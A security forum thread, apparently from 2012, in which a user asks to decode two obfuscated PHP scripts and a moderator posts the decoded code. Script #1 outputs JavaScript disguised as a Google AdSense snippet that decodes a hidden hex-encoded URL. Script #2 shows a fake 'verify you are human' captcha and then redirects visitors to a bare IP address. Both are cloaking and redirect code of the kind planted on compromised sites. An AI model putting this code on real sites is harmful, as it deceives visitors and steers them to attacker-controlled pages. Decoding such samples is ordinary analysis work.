Waraxe IT Security Portal
Login or Register
November 23, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 41
Members: 0
Total: 41
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PHP script decode requests -> Can You decode this one?
Post new topicReply to topic View previous topic :: View next topic
Can You decode this one?
PostPosted: Tue Aug 14, 2012 6:59 pm Reply with quote
pauliakas
Beginner
Beginner
Joined: Aug 14, 2012
Posts: 2




Can You decode this one?

http://pastebin.com/WL67m2wJ
http://pastebin.com/GKM7YxAb


Thank You
View user's profile Send private message Visit poster's website
PostPosted: Tue Aug 14, 2012 7:44 pm Reply with quote
demon
Moderator
Moderator
Joined: Sep 22, 2010
Posts: 485




#1
Code:
<?php
foreach($_GET as$k=>$v)if(preg_match("!^[a-z0-9]{10,32}\$!is",$k)){
$txt='<SCRIPT language=javascript>
<!--
function getme(str)
{ var idx = str.indexOf("?"); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++)
{ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); }
document.write(new_str.substr(0,new_str.length-11)+"&gokk=ZZZZ";</script>");
}
google_ad_client = "pub-1430584408313843";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_ad_channel = "";
getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3B71606E646A6D186357635B685358552C10574D614B5C4B594F5558052058494D424C530946483B384A3E43410FF33843423D06FAF902FDF5F7FBFDF1F3F9F7EDF7F5EB2424211E1F1CE3241B22F01D1622111216E7DDDDDADACB12190A050CDC11080005FFBBD3D3C508F705FB0104CD");
//--> </SCRIPT>';
echo str_replace("ZZZZ",$k,$txt);
exit;
}
?>


#2
Code:
<?php
foreach($_GET as$k=>$v)if(preg_match("!^[a-z0-9]{10,32}$!is",$k)){session_start();
if(isset($_POST["res"])&&$_SESSION["res"]==$_POST["res"]){
header("Location: http://95.169.187.98/ijhfhf.php?mgtdfk=4534&nvhdl=skdje&gokk=".substr($k,-5));
}
else{
$a=mt_rand(1,9);
$c=mt_rand(1,9);
if(mt_rand(0,1)==1){
$_SESSION["res"]=$a+$c;
$b="+";
}
else{
$_SESSION["res"]=$a-$c;
$b="-";
}
echo"<form method='post'>\n\t <div style='width:520px;
margin:0px auto;
margin-top:100px;
padding:15px;
border:1px solid #333;
background-color:#eee;
'>\n\t Please verify that you are human,\n\t what is result of: ".$a." ".$b." ".$c." =\n\t <input type='text' name='res' size='2' value='?'>\n\t <input type='submit' value='I am Human!'>\n\t </div></form>";
}exit;
}
?>
View user's profile Send private message
PostPosted: Tue Aug 14, 2012 7:48 pm Reply with quote
astra1993
Advanced user
Advanced user
Joined: Jun 20, 2012
Posts: 125




Here you go:

pauliakas1.zip
View user's profile Send private message
PostPosted: Tue Aug 14, 2012 7:52 pm Reply with quote
pauliakas
Beginner
Beginner
Joined: Aug 14, 2012
Posts: 2




thank you for fast job.
View user's profile Send private message Visit poster's website
Can You decode this one?
www.waraxe.us Forum Index -> PHP script decode requests
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.043 Seconds